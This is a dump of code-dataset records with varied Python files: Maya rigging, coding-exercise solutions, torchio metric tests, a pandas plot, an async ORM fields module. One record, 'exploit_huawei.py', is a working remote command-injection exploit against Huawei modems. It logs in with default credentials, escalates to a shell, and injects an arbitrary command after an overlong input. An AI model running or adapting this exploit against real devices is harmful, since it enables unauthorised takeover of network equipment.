n=pntOnCrv+'_plus_worldTangent' )\r\n\r\n # 리깅\r\n pntOnCrv.position >> plus_wt.input3D[0]\r\n pntOnCrv.normalizedTangent >> plus_wt.input3D[1]\r\n plus_wt.output3D >> pntOnCrv.worldTangent\r\n\r\n pntOnCrv.worldTangent >> aimConst.target[0].targetTranslate\r\n\r\n elif self.worldAimType=='normal':\r\n pntOnCrv.addAttr( 'worldNormal', sn='wt', at='double3')\r\n pntOnCrv.addAttr( 'worldNormalX', sn='wtx', at='double', p='worldNormal')\r\n pntOnCrv.addAttr( 'worldNormalY', sn='wty', at='double', p='worldNormal')\r\n pntOnCrv.addAttr( 'worldNormalZ', sn='wtz', at='double', p='worldNormal')\r\n\r\n # 덧셈노드\r\n plus_wt = pm.createNode( 'plusMinusAverage', n=pntOnCrv+'_plus_worldNormal' )\r\n\r\n # 리깅\r\n pntOnCrv.position >> plus_wt.input3D[0]\r\n pntOnCrv.normalizedNormal >> plus_wt.input3D[1]\r\n plus_wt.output3D >> pntOnCrv.worldNormal\r\n\r\n pntOnCrv.worldNormal >> aimConst.target[0].targetTranslate\r\n\r\n elif self.worldAimType=='vector':\r\n aimConst.addAttr( 'worldAimVector', sn='wn', at='double3')\r\n aimConst.addAttr( 'worldAimVectorX', sn='wnx', at='double', p='worldAimVector')\r\n aimConst.addAttr( 'worldAimVectorY', sn='wny', at='double', p='worldAimVector')\r\n aimConst.addAttr( 'worldAimVectorZ', sn='wnz', at='double', p='worldAimVector')\r\n aimConst.worldAimVector.set(worldAimVector)\r\n\r\n # 덧셈노드\r\n plus_worldAimVec = pm.createNode( 'plusMinusAverage', n=pntOnCrv+'_plus_worldAimVector' )\r\n\r\n # 리깅\r\n pntOnCrv.position >> plus_worldAimVec.input3D[0]\r\n aimConst.worldAimVector >> plus_worldAimVec.input3D[1]\r\n\r\n plus_worldAimVec.output3D >> aimConst.target[0].targetTranslate\r\n\r\n elif self.worldAimType=='object':\r\n worldAimObject = pm.PyNode( self.worldAimObject )\r\n worldAimObject.translate >> aimConst.target[0].targetTranslate\r\n worldAimObject.rotatePivot >> aimConst.target[0].targetRotatePivot\r\n worldAimObject.rotatePivotTranslate >> aimConst.target[0].targetRotateTranslate\r\n worldAimObject.parentMatrix[0] >> aimConst.target[0].targetParentMatrix\r\n\r\n elif self.worldAimType=='curverotate':\r\n # mtx = pm.createNode('addMatrix')\r\n # crvTrans.worldMatrix[0] >> mtx.matrixIn[0]\r\n # crvTrans.parentMatrix[0] >> aimConst.target[0].targetParentMatrix\r\n # mtx.matrixIn[1].set( 1.0, 0.0, 0.0, 0.0, 0.0, 1.0, 0.0, 0.0, 0.0, 0.0, 1.0, 0.0, 0.0, 1.0, 0.0, 1.0, type='matrix' )\r\n\r\n mtx = pm.createNode('composeMatrix')\r\n mtx = pm.createNode('decomposeMatrix')\r\n\r\n # -------------------------------------\r\n #\r\n # aimConstraint : worldUpType\r\n #\r\n # -------------------------------------\r\n if self.worldUpType=='tangent':\r\n pntOnCrv.tangent >> aimConst.worldUpVector\r\n\r\n elif self.worldUpType=='normal':\r\n pntOnCrv.normal >> aimConst.worldUpVector\r\n\r\n elif self.worldUpType=='vector':\r\n aimConst.worldUpVector.set( worldUpVector )\r\n\r\n elif self.worldUpType=='object':\r\n worldUpObject = pm.PyNode( self.worldUpObject )\r\n worldUpObject.worldMatrix[0] >> aimConst.worldUpMatrix\r\n aimConst.worldUpType.set( 1 )\r\n\r\n elif self.worldUpType=='objectrotation':\r\n worldUpObject = pm.PyNode( self.worldUpObject )\r\n worldUpObject.worldMatrix[0] >> aimConst.worldUpMatrix\r\n aimConst.worldUpType.set( 2 )\r\n\r\n elif self.worldUpType=='curverotation':\r\n self.curve.worldMatrix[0] >> aimConst.worldUpMatrix\r\n aimConst.worldUpType.set( 2 )\r\n\r\n elif self.worldUpType=='scene':\r\n aimConst.worldUpType.set( 0 )\r\n\r\n def orientRig(self):\r\n pm.orientConstraint( self.curve, self.locator )\r\n\r\n def _strToVec( self, inputVal ):\r\n '''\r\n Abstract\r\n ========\r\n 1. 문자를 벡터형으로 리턴\r\n\r\n 2. 예제 :\r\n >> getVectorByChar( 'x' )\r\n dt.Vector([1.0, 0.0, 0.0])\r\n\r\n >> getVectorByChar( 'y' )\r\n dt.Vector([1.0, 1.0, 0.0])\r\n\r\n @param inputVal: 'x','y','z','-x','-y','-z', or vector\r\n @type inputVal: str | tuple | pm.dt.Vector\r\n\r\n @return : 입력된 캐릭터에 대응하는 벡터\r\n @rtype : pm.dt.Vector\r\n\r\n @version No 0.7\r\n '''\r\n\r\n # 입력된 값이 문자열일경우\r\n if isinstance( inputVal, str ) or isinstance( inputVal, unicode ):\r\n\r\n # 입력된 값을 앞뒤 빈칸을 없애고, 소문자로 변경\r\n inputVal = inputVal.strip().lower()\r\n\r\n # 아래 리스트에 없는 값이 들어오면 에러\r\n if not inputVal in ['x','y','z','-x','-y','-z']:\r\n raise\r\n\r\n # 매칭\r\n if inputVal.lower()== 'x': return pm.dt.Vector( 1, 0, 0)\r\n elif inputVal.lower()=='-x': return pm.dt.Vector(-1, 0, 0)\r\n elif inputVal.lower()== 'y': return pm.dt.Vector( 0, 1, 0)\r\n elif inputVal.lower()=='-y': return pm.dt.Vector( 0,-1, 0)\r\n elif inputVal.lower()== 'z': return pm.dt.Vector( 0, 0, 1)\r\n elif inputVal.lower()=='-z': return pm.dt.Vector( 0, 0,-1)\r\n\r\n else:\r\n return pm.dt.Vector( inputVal )\r\n\r\ndef locatorOnCurve(*args, **kwargs):\r\n if args:\r\n pm.select(args)\r\n\r\n locs = []\r\n for item in pm.selected(fl=True):\r\n loc = LocatorOnCurve( item, **kwargs )\r\n locs.append(loc)\r\n\r\n return locs","sub_path":"maya/rigLocatorOnCurve.py","file_name":"rigLocatorOnCurve.py","file_ext":"py","file_size_in_byte":16123,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"135437179","text":"import sys\nsys.stdin = open(\"input.txt\")\n\n'''\n도착지점부터 역으로 위로 올라가면서 시작점 col idx를 찾으면 됨.\n1. 위로 가는 경우: 왼쪽이나 오른쪽이 1이 나오면 d 체인지\n2. 오른쪽으로 가는 경우: 쭉 가다가 0 나오면 위로 턴 (d: 1 -> 0)\n3. 왼쪽으로 가는 경우: 쭉 가다가 0 나오면 위로 턴 (d: 2 -> 0)\n'''\n\n# direction 설정 (위, 오, 왼)\ndr = [-1, 0, 0]\ndc = [0, 1, -1]\n\nT = 10\nfor tc in range(1, T+1):\n t = int(input())\n # 양 끝에 벽을 세워주기 위해 0 컬럼 추가\n a = [[0] + list(map(int, input().split())) + [0] for _ in range(100)]\n\n # c: 도착점 column idx 구하기\n for j in range(102):\n if a[99][j] == 2:\n c = j\n\n # 방향 위로 초기화\n d = 0 # 0: 위, 1: 오, 2: 왼\n r = 99\n while True:\n # 반복문 계속 돌리다가 row 인덱스가 0 이 되면 끝내고 리턴\n if r == 0:\n break\n\n # 오른쪽에 1이 있으면 오른쪽으로 계속 가다가 0 나오면 반복문 종료\n if a[r][c+1]:\n d = 1\n while True:\n r += dr[d]\n c += dc[d]\n if a[r][c+1] == 0:\n break\n\n # 왼쪽에 1이 있으면 왼쪽으로 계속 가다가 0 나오면 반복문 종료\n elif a[r][c-1]:\n d = 2\n while True:\n r += dr[d]\n c += dc[d]\n if a[r][c-1] == 0:\n break\n\n # 양옆에 1 하나도 없으면 계속 직진(i.e. d=0) 또는\n # 왼쪽이든 오른쪽이든 가다가 next col에서 0이면 d=0(위)로 체인지\n d = 0\n r += dr[d]\n c += dc[d]\n\n print(\"#{} {}\".format(t, c-1))\n\n","sub_path":"src/swea/1210/sol1.py","file_name":"sol1.py","file_ext":"py","file_size_in_byte":1776,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"175247172","text":"import argparse\nimport socket\nimport time\nimport sys\n\n\ndef check_partern(sock, p):\n curtime = time.time()\n while (time.time() - curtime) <= 5:\n data = sock.recv(1024)\n if p in data:\n return True\n print(\"false to receive parten: \", p)\n print(\"attack terminated !!!!!!\")\n sys.exit(1)\n\n\nclass PesudoConn:\n def __init__(self, target_ip, target_port):\n self.target_ip = target_ip\n self.target_port = target_port\n self.s = None\n\n def send(self, cmd):\n g_victim_ip = self.target_ip\n g_victim_port = int(self.target_port)\n g_command = cmd\n self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.s.connect((g_victim_ip, g_victim_port))\n self.s.sendall(b'\\nroot\\n')\n check_partern(self.s, \"assword\")\n self.s.sendall(b'admin\\n')\n check_partern(self.s, \"WAP\")\n self.s.sendall(b\"su\\n\")\n check_partern(self.s, \"WAP\")\n self.s.sendall(b'shell\\n')\n check_partern(self.s, \"WAP\")\n self.s.sendall(\n b'exittttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttt\\r\\n')\n _ = self.s.recv(1024)\n # print(data)\n time.sleep(0.1)\n self.s.sendall(b'|' + g_command + ' \\r\\n\\r\\n')\n time.sleep(0.5)\n pass\n\n def recv(self, _):\n data = self.s.recv(1024)\n if len(data) > 0:\n p = data.find(\"File name too long\\r\\n\")\n data = data[p + 20:]\n p = data.find(\"WAP\")\n data = data[:p]\n self.s.close()\n return data\n return \"\"\n\n def close(self):\n pass\n\n\ndef exploit_func(target_ip, target_port):\n conn = PesudoConn(target_ip=target_ip,\n target_port=target_port)\n return conn\n\n\ndef main():\n parser = argparse.ArgumentParser(description='Huawei exploit')\n parser.add_argument('-i','--ip', help='IP of victim\\'s modem',required=True, dest='victim_ip')\n parser.add_argument('-p','--port',help='Port of victim\\'s modem', required=True, dest='victim_port')\n parser.add_argument('-c','--command',help='command to execute', required=True, dest='command')\n\n args = parser.parse_args()\n\n g_victim_ip = args.victim_ip\n g_victim_port = int(args.victim_port)\n g_command = args.command\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s.connect((g_victim_ip, g_victim_port))\n s.sendall(b'\\nroot\\n')\n check_partern(s,\"assword\")\n s.sendall(b'admin\\n')\n check_partern(s,\"WAP\")\n s.sendall(b\"su\\n\")\n check_partern(s,\"WAP\")\n s.sendall(b'shell\\n')\n check_partern(s,\"WAP\")\n s.sendall(b'exittttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttt\\r\\n')\n _ = s.recv(1024)\n # print(data)\n time.sleep(0.1)\n s.sendall(b'|' + g_command + ' \\r\\n\\r\\n')\n time.sleep(0.5)\n data = s.recv(1024)\n p = data.find(\"File name too long\\r\\n\")\n data = data[p + 20:]\n p = data.find(\"WAP\")\n data = data[:p]\n # print('Received: \\n', data)\n print(data)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"exploits/exploit_huawei.py","file_name":"exploit_huawei.py","file_ext":"py","file_size_in_byte":3966,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"311319321","text":"from torchio import Subject, Image, ImagesDataset\nfrom torchio.transforms import RandomMotionFromTimeCourse\nfrom torchio.metrics import SSIM3D, MetricWrapper, MapMetricWrapper\nfrom torchio.metrics.ssim import functional_ssim\nfrom torch.nn import MSELoss, L1Loss\nimport torch\nfrom nibabel.viewers import OrthoSlicer3D as ov\n\nt1_path = \"/data/romain/HCPdata/suj_100307/T1w_acpc_dc_restore.nii\"\nmask_path = \"/data/romain/HCPdata/suj_100307/cat12/fill_mask_head.nii.gz\"\ndataset = ImagesDataset([\n Subject({\n \"T1\": Image(t1_path),\n \"mask\": Image(mask_path, type=\"mask\"),\n \"mask2\": Image(mask_path, type=\"mask\")\n })])\n\nmetrics = {\n \"L1\": MetricWrapper(\"L1\", L1Loss()),\n \"L1_map\": MapMetricWrapper(\"L1_map\", lambda x, y: torch.abs(x-y), average_method=\"mean\", mask_keys=['mask2']),\n \"L2\": MetricWrapper(\"L2\", MSELoss()),\n #\"SSIM\": SSIM3D(average_method=\"mean\"),\n \"SSIM_mask\": SSIM3D(average_method=\"mean\", mask_keys=[\"mask\", \"mask2\"]),\n \"SSIM_Wrapped\": MetricWrapper(\"SSIM_wrapped\", lambda x, y: functional_ssim(x, y, return_map=False), use_mask=True, mask_key=\"mask\"),\n \"ssim_base\": MetricWrapper('SSIM_base', ssim3D)\n}\n\nmotion_trsfm = RandomMotionFromTimeCourse(verbose=True, compare_to_original=True, metrics=metrics,\n oversampling_pct=0.0)\n\ndataset.set_transform(motion_trsfm)\n\ntf = dataset[0]\ncomputed_metrics = tf[\"T1\"][\"metrics\"]\nprint(\"Computed metrics: {}\".format(computed_metrics))\n\nov(tf['T1']['data'].squeeze().numpy())\n","sub_path":"notebooks/tests_metrics.py","file_name":"tests_metrics.py","file_ext":"py","file_size_in_byte":1514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"310936717","text":"import codecademylib\r\nimport pandas as pd\r\nfrom matplotlib import pyplot as plt\r\n\r\nspecies = pd.read_csv('species_info.csv')\r\nspecies['is_sheep'] = species.common_names.apply(lambda x: 'Sheep' in x)\r\nsheep_species = species[(species.is_sheep) & (species.category == 'Mammal')]\r\n\r\nobservations = pd.read_csv('observations.csv')\r\n\r\nsheep_observations = observations.merge(sheep_species)\r\n\r\nobs_by_park = sheep_observations.groupby('park_name').observations.sum().reset_index()\r\n\r\nplt.figure(figsize =(16,4))\r\nplt.bar(range(len(obs_by_park['park_name'])), obs_by_park['observations'])\r\nax = plt.subplot()\r\nax.set_xticks(range(len(obs_by_park['park_name'])))\r\nax.set_xticklabels(obs_by_park['park_name'])\r\n\r\nplt.title('Observations of Sheep per Week')\r\nplt.xlabel('Park Name')\r\nplt.ylabel('Number of Observations')\r\nplt.savefig('Observations_by_Parks.png')\r\nplt.show()","sub_path":"Capstone - Biodiversity/Sheep Sightings.py","file_name":"Sheep Sightings.py","file_ext":"py","file_size_in_byte":864,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"252023880","text":"# -*- coding: utf-8 -*-\nimport math\n\n#COMECE SEU CODIGO AQUI\na=int(input('digite o valor: '))\n\nc20= a//20\na= a%20\nc10= a//10\na= a%10\nc5= a//5\na= a%5\nc2= a//2\na= a%2\nc1= a//1\n\nprint(c20)\nprint(c10)\nprint(c5)\nprint(c2)\nprint(c1)","sub_path":"moodledata/vpl_data/154/usersdata/269/65460/submittedfiles/atm.py","file_name":"atm.py","file_ext":"py","file_size_in_byte":226,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"330229660","text":"list_1 = []\r\nlist_2 = []\r\n\r\n\r\ndef mass_keys():\r\n str = []\r\n while (True):\r\n word = input()\r\n if word == \"quit\":\r\n break\r\n else:\r\n str.append(c)\r\n return str\r\n\r\n\r\ndef mass_values(str):\r\n str_3 = []\r\n for i in range(len(str)):\r\n word = input()\r\n str_3.append(word)\r\n return str_3\r\n\r\n\r\ndef multipl(str_3, str):\r\n summ = {str[i]: str_3[i] for i in range(len(str))}\r\n return summ\r\n\r\n\r\nprint(\"Для выхода из цикла введите - quit\")\r\nlist_1 = mass_keys()\r\n\r\nmultiplicity = set(list_1)\r\nprint(\"список -\", list_1)\r\nprint(\"множество - \", multiplicity)\r\nprint(\"количество символов в списке =\", len(list_1))\r\nprint(\"заполните следующий список из\", len(list_1), \"символов\")\r\n\r\nlist_2 = mass_values(list_1)\r\n\r\nprint(list_2)\r\nlist = multipl(list_2, list_1)\r\nprint(list)\r\n","sub_path":"Project_6.1.py","file_name":"Project_6.1.py","file_ext":"py","file_size_in_byte":932,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"178574837","text":"# You are given two non-empty linked lists representing two non-negative integers.\n# The digits are stored in reverse order, and each of their nodes contains a single digit.\n# Add the two numbers and return the sum as a linked list.\n\n# You may assume the two numbers do not contain any leading zero, except the number 0 itself.\n\n\n# Example 1:\n\n# Input: l1 = [2,4,3], l2 = [5,6,4]\n# Output: [7,0,8]\n# Explanation: 342 + 465 = 807.\n\n# Example 2:\n\n# Input: l1 = [0], l2 = [0]\n# Output: [0]\n\n# Example 3:\n\n# Input: \n# l1 = [9,9,9,9,9,9,9], \n# l2 = [9,9,9,9]\n# Output: \n# [8,9,9,9,0,0,0,1]\n\n\n# Constraints:\n\n# The number of nodes in each linked list is in the range [1, 100].\n# 0 <= Node.val <= 9\n# It is guaranteed that the list represents a number that does not have leading zeros.\n# =============================================================================\n\n# Definition for singly-linked list.\nclass ListNode:\n def __init__(self, val=0, next=None):\n self.val = val\n self.next = next\n \nclass Solution:\n def addTwoNumbers(self, l1: Optional[ListNode], l2: Optional[ListNode]) -> Optional[ListNode]:\n \n answer = ListNode()\n currentNode = answer\n \n carry = 0\n while l1 or l2 or carry:\n # initialize current values, use default 0 if None\n value1 = l1.val if l1 else 0\n value2 = l2.val if l2 else 0\n \n # add values and update the carry\n sum = value1 + value2 + carry\n carry = sum // 10\n # create a new node, with the mod value of the sum\n currentNode.next = ListNode(sum % 10)\n \n # move current node to its next node\n currentNode = currentNode.next\n \n # move l1 and l2 to their next respective nodes, or set to None if they're at the end\n l1 = l1.next if l1 else 0\n l2 = l2.next if l2 else 0\n \n return answer.next\n \n \n\n\n# Explainer\n# \n# Edge cases to consider. What if one list has more values than the other? Use a zero.\n# \n# For each value in the list, add it to the sum. If the sum is greater than 10, \n# we can use floor division to get the remainder., and carry that value over to the next digit.\n# Now, we can create \n\n","sub_path":"leetcode/0002-AddTwoNumbers.py","file_name":"0002-AddTwoNumbers.py","file_ext":"py","file_size_in_byte":2330,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"607055557","text":"import json\nimport re\n\nfrom decimal import Decimal\nfrom uuid import UUID\nfrom json.decoder import JSONDecodeError\n\nfrom datetime import datetime, date, time\nfrom ..exceptions import FieldError # , ModuleError\n\nDATE_FIELDS = ['DateField', ]\n\nKWARGS_TYPES = {\n 'db_column': str,\n 'uuid_type': str,\n 'default': object,\n 'null': bool,\n 'max_length': int,\n 'foreign_key': str,\n 'auto_now': bool,\n 'reverse_field': str,\n 'choices': (dict, tuple),\n 'unique': bool,\n 'strftime': str,\n 'max_digits': int,\n 'decimal_places': int,\n}\n\n\nclass Field(object):\n required_kwargs = []\n table_name = None\n\n def __init__(self, **kwargs):\n self.validate_kwargs(kwargs)\n self.field_type = self.__class__.__name__\n\n for kw in kwargs.keys():\n setattr(self, kw, kwargs.get(kw))\n if kw == 'choices':\n if isinstance(kwargs.get(kw), dict):\n self.choices = kwargs.get(kw)\n elif kwargs.get(kw) is None:\n pass\n else:\n self.choices = {k: v for k, v in kwargs.get(kw)}\n\n def creation_query(self):\n creation_string = '{db_column} ' + self.creation_string\n date_field = self.field_type in DATE_FIELDS\n\n creation_string += self.null and ' NULL' or ' NOT NULL'\n\n if hasattr(self, 'default') and self.default is not None:\n creation_string += ' DEFAULT '\n default_value = self.default\n if callable(self.default):\n default_value = self.default()\n\n if isinstance(default_value, str):\n creation_string += '\\'{}\\''.format(default_value)\n elif isinstance(default_value, bool):\n creation_string += str(default_value)\n else:\n creation_string += '\\'{}\\''.format(\n self.sanitize_data(default_value)\n )\n\n elif date_field and self.auto_now:\n creation_string += ' DEFAULT now()'\n\n if self.unique:\n creation_string += ' UNIQUE'\n\n return creation_string.format(**self.__dict__)\n\n #######################################################\n #######################################################\n # def modificate_query(self):\n # modificate_string = '{db_column} ' + self.modificate_string\n # date_field = self.field_type in DATE_FIELDS\n\n # modificate_string += self.null and ' NULL' or ' NOT NULL'\n\n # if hasattr(self, 'default') and self.default is not None:\n # modificate_string += ' DEFAULT '\n # default_value = self.default\n # if callable(self.default):\n # default_value = self.default()\n\n # if isinstance(default_value, str):\n # modificate_string += '\\'{}\\''.format(default_value)\n # elif isinstance(default_value, bool):\n # modificate_string += str(default_value)\n # else:\n # modificate_string += '\\'{}\\''.format(\n # self.sanitize_data(default_value)\n # )\n\n # elif date_field and self.auto_now:\n # modificate_string += ' DEFAULT now()'\n\n # if self.unique:\n # modificate_string += ' UNIQUE'\n\n # return modificate_string.format(**self.__dict__)\n #######################################################\n #######################################################\n\n def validate_kwargs(self, kwargs):\n for kw in self.required_kwargs:\n if not kwargs.get(kw, None):\n raise FieldError(\n '\"{class_name}\" field requires {kw}'.format(\n class_name=self.__class__.__name__,\n kw=kw,\n )\n )\n\n for k, v in kwargs.items():\n null_choices = v is None and k == 'choices'\n if not isinstance(v, KWARGS_TYPES[k]) and not null_choices:\n raise FieldError('Wrong value for {k}'.format(k=k))\n\n if kwargs.get('db_column', ''):\n self.set_field_name(kwargs['db_column'])\n\n def validate(self, value):\n if value is None and not self.null:\n raise FieldError('null value in NOT NULL field')\n\n if hasattr(self, 'choices') and self.choices is not None:\n if value not in self.choices.keys():\n raise FieldError('\"{}\" not in model choices'.format(value))\n\n if not isinstance(value, self.internal_type):\n raise FieldError(\n '{} is a wrong datatype for field {}'.format(\n value, self.__class__.__name__\n )\n )\n\n @classmethod\n def recompose(cls, value):\n return value\n\n def sanitize_data(self, value):\n '''method used to convert to SQL data'''\n if value is None:\n return 'NULL'\n self.validate(value)\n return value\n\n def serialize_data(self, value):\n '''to directly serialize the data field based'''\n return value\n\n def current_state(self):\n return {arg: getattr(self, arg) for arg in self.args}\n\n # def make_migration(self, old_state):\n # if old_state is None:\n # return self.creation_query()\n\n # current_state = self.current_state()\n\n # if set(old_state.keys()) != set(current_state.keys()):\n # raise ModuleError(\n # 'imposible to migrate, you should do that manually!'\n # )\n\n # difference = {}\n # for key in self.args:\n\n # if current_state[key] != old_state[key]:\n # difference.update({key: current_state[key]})\n\n # return difference or None\n\n def set_field_name(self, db_column):\n if '__' in db_column:\n raise FieldError('db_column can not contain \"__\"')\n if db_column.startswith('_'):\n raise FieldError('db_column can not start with \"_\"')\n if db_column.endswith('_'):\n raise FieldError('db_column can not end with \"_\"')\n self.db_column = db_column\n\n\nclass PkField(Field):\n internal_type = int\n creation_string = 'serial primary key'\n args = ('db_column', 'unique', 'null',)\n\n def __init__(self, db_column='id', null=False):\n super().__init__(db_column=db_column, unique=True, null=null)\n\n\nclass Uuid4Field(Field):\n internal_type = UUID\n args = ('db_column', 'unique', 'null', 'uuid_type')\n\n def __init__(\n self, db_column='', null=False, uuid_type='v4'):\n self.field_requirement = 'CREATE EXTENSION IF NOT EXISTS \"uuid-ossp\";'\n\n if uuid_type not in ['v1', 'v4']:\n raise FieldError('{} is not a recognized type'.format(uuid_type))\n\n super().__init__(\n db_column=db_column, unique=True, default=None, null=null,\n uuid_type=uuid_type\n )\n\n @property\n def creation_string(self):\n uuid_types = {\n 'v1': 'uuid_generate_v1mc',\n 'v4': 'uuid_generate_v4',\n }\n return 'UUID DEFAULT {}()'.format(uuid_types[self.uuid_type])\n\n\nclass BooleanField(Field):\n internal_type = bool\n creation_string = 'boolean'\n args = ('db_column', 'default', 'null', 'unique', )\n\n def __init__(self, db_column='', default=None, null=False, unique=False):\n super().__init__(db_column=db_column, default=default,\n null=null, unique=unique\n )\n\n def sanitize_data(self, value):\n '''method used to convert to SQL data'''\n if value is None:\n return 'NULL'\n elif value is True:\n return 'true'\n elif value is False:\n return 'false'\n\n\nclass CharField(Field):\n internal_type = str\n required_kwargs = ['max_length', ]\n creation_string = 'varchar({max_length})'\n args = ('db_column', 'default', 'max_length', 'null', 'choices', 'unique')\n\n def __init__(self, db_column='', default=None, max_length=0,\n null=False, choices=None, unique=False\n ):\n super().__init__(db_column=db_column, default=default,\n max_length=max_length, null=null, choices=choices,\n unique=unique\n )\n\n def sanitize_data(self, value):\n value = super().sanitize_data(value)\n if len(value) > self.max_length:\n raise FieldError(\n ('The string entered is bigger than '\n 'the \"max_length\" defined ({})'\n ).format(self.max_length)\n )\n return '\\'{}\\''.format(value)\n\n\nclass EmailField(CharField):\n\n def validate(self, value):\n super(EmailField, self).validate(value)\n # now validate the emailfield here\n email_regex = r'(^[\\w][\\w0-9_.+-]+@[\\w0-9-]+\\.[\\w0-9-.]+$)'\n if not re.match(email_regex, value):\n raise FieldError('\"{}\" not a valid email address'.format(value))\n\n\nclass JsonField(Field):\n internal_type = dict, list, str\n required_kwargs = ['max_length', ]\n creation_string = 'varchar({max_length})'\n args = ('db_column', 'default', 'max_length', 'null', 'choices', 'unique')\n\n def __init__(self, db_column='', default=None, max_length=0,\n null=False, choices=None, unique=False\n ):\n super().__init__(\n db_column=db_column, default=default,\n max_length=max_length, null=null, choices=choices,\n unique=unique\n )\n\n @classmethod\n def recompose(cls, value):\n return json.loads(value)\n\n def sanitize_data(self, value):\n self.validate(value)\n\n if value != 'NULL':\n if isinstance(value, str):\n try:\n value = json.loads(value)\n except JSONDecodeError:\n raise FieldError(\n 'The data entered can not be converted to json'\n )\n value = json.dumps(value)\n\n if len(value) > self.max_length:\n raise FieldError(\n ('The string entered is bigger than '\n 'the \"max_length\" defined ({})'\n ).format(self.max_length)\n )\n\n return '\\'{}\\''.format(value)\n\n\nclass NumberField(Field):\n pass\n\n\nclass IntegerField(NumberField):\n internal_type = int\n creation_string = 'integer'\n args = ('db_column', 'default', 'null', 'choices', 'unique')\n\n def __init__(self, db_column='', default=None, null=False, choices=None,\n unique=False):\n super().__init__(db_column=db_column, default=default, null=null,\n choices=choices, unique=unique)\n\n def sanitize_data(self, value):\n value = super().sanitize_data(value)\n\n return '{}'.format(value)\n\n\nclass DecimalField(NumberField):\n internal_type = (Decimal, float, int)\n creation_string = 'decimal({max_digits},{decimal_places})'\n args = ('db_column', 'default', 'null', 'choices', 'unique',\n 'max_digits', 'decimal_places')\n\n def __init__(self, db_column='', default=None, null=False, choices=None,\n unique=False, max_digits=10, decimal_places=2):\n super().__init__(db_column=db_column, default=default, null=null,\n choices=choices, unique=unique,\n max_digits=max_digits, decimal_places=decimal_places)\n\n def sanitize_data(self, value):\n value = super().sanitize_data(value)\n\n return '{}'.format(value)\n\n\nclass DateField(Field):\n internal_type = date\n creation_string = 'date'\n args = ('db_column', 'default', 'auto_now', 'null', 'choices', 'unique',\n 'strftime')\n\n def __init__(self, db_column='', default=None, auto_now=False, null=False,\n choices=None, unique=False, strftime='%Y-%m-%d'\n ):\n super().__init__(db_column=db_column, default=default,\n auto_now=auto_now, null=null, choices=choices,\n unique=unique, strftime=strftime\n )\n\n def sanitize_data(self, value):\n value = super().sanitize_data(value)\n\n return \"'{}'\".format(value)\n\n def serialize_data(self, value):\n return value.strftime(self.strftime)\n\n\nclass DateTimeField(DateField):\n internal_type = datetime\n creation_string = 'timestamp'\n args = ('db_column', 'default', 'auto_now', 'null', 'choices', 'unique',\n 'strftime')\n\n def __init__(self, db_column='', default=None, auto_now=False, null=False,\n choices=None, unique=False, strftime='%Y-%m-%d %H:%s'\n ):\n super().__init__(db_column=db_column, default=default,\n auto_now=auto_now, null=null, choices=choices,\n unique=unique, strftime=strftime\n )\n\n\nclass TimeField(DateField):\n internal_type = time\n creation_string = 'time'\n args = ('db_column', 'default', 'auto_now', 'null', 'choices', 'unique',\n 'strftime')\n\n def __init__(self, db_column='', default=None, auto_now=False, null=False,\n choices=None, unique=False, strftime='%H:%s'\n ):\n super().__init__(db_column=db_column, default=default,\n auto_now=auto_now, null=null, choices=choices,\n unique=unique, strftime=strftime\n )\n\n\nclass ForeignKey(Field):\n internal_type = int\n required_kwargs = ['foreign_key', ]\n creation_string = 'integer references {foreign_key}'\n args = ('db_column', 'default', 'foreign_key', 'null', 'unique')\n\n def __init__(self, db_column='', default=None, foreign_key='',\n null=False, unique=False):\n super().__init__(db_column=db_column, default=default,\n foreign_key=foreign_key, null=null, unique=unique\n )\n\n def sanitize_data(self, value):\n value = super().sanitize_data(value)\n return str(value)\n\n\nclass ManyToManyField(Field):\n internal_type = list, int\n required_kwargs = ['foreign_key', ]\n creation_string = '''\n {own_model} INTEGER REFERENCES {own_model} NOT NULL,\n {foreign_key} INTEGER REFERENCES {foreign_key} NOT NULL\n '''\n args = ('db_column', 'default', 'foreign_key', 'unique')\n\n def __init__(self, db_column='', foreign_key=None, default=None,\n unique=False):\n super().__init__(db_column=db_column, foreign_key=foreign_key,\n default=default, unique=unique\n )\n\n def creation_query(self):\n return self.creation_string.format(**self.__dict__)\n\n def validate(self, value):\n if isinstance(value, list):\n for i in value:\n super().validate(i)\n else:\n super().validate(value)\n","sub_path":"asyncorm/models/fields.py","file_name":"fields.py","file_ext":"py","file_size_in_byte":14958,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"468943739","text":"import logging\nimport pytest\nfrom retrying import retry\n\nlogger = logging.getLogger(__name__)\n\n\ndef pytest_addoption(parser):\n \"\"\"\n Adding an command line option to signal\n how many times the tests marked with this fixture\n should be executed.\n If not specified the tests will be executed 